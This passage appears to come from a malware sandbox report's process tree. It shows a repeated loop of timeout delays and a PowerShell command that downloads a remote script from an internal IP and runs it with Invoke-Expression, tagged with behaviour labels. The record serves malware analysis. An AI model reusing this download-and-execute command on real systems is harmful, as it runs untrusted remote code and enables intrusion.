2⤵
- Delays execution with timeout.exe
PID:3588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3788

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4456

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1128

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5048

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:2844

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3608

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:2448

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3360

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3440

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:884

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3672

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:724

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:5028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4948

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4688

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4904

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4364

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4540

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3680

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2068

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:5104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:444

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4280

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1660

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4172

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2600

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:980

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:2272

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2464

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:3480

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1840

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1180

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4632

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1156

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5000

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3816

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4248

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1904

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4280

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:5060

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1104

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:3896

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3256

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2384

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1052

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3392

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4264

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2000

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4080

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1652

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2848

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3344

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1688

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2544

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3456

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:924

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3440

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3896

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:3604

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:2752

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1876

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3432

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2728

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:3236

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2172

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2816

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:316

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:2448

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2288

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:5016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1364

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4888

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:5108

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3640

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:220

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2908

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:1976

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:620

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:1576

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4700

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:1180

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3676

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3000

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4632

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:2660

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4964

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2000

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4920

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:4972

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4844

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:1660

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4940

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1052

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4132

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1656

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1944

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:624

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2908

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:4200

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1224

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1552

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3476

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2164

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4572

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:1784

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4728

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1172

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3624

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:4256

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:316

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:424

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3812

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1008

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4984

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:680

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:956

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:4328

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3568

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:3936

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:1332

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:1368

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4612

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:4616

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1744

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:2188

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3588

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:628

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4632

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:2628

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:4988

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:4880

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1032

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:536

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:3812

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:5016

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
- Delays execution with timeout.exe
PID:540

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:3012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:4344

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1688

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
PID:4408

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:1516

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:3468

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:4240

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.127.1.21:8080/script.ps1')"
2⤵
- Command and Scripting Interpreter: PowerShell
PID:116

C:\Windows\system32\timeout.exe
timeout /t 5
2⤵
PID:2788

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:4848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
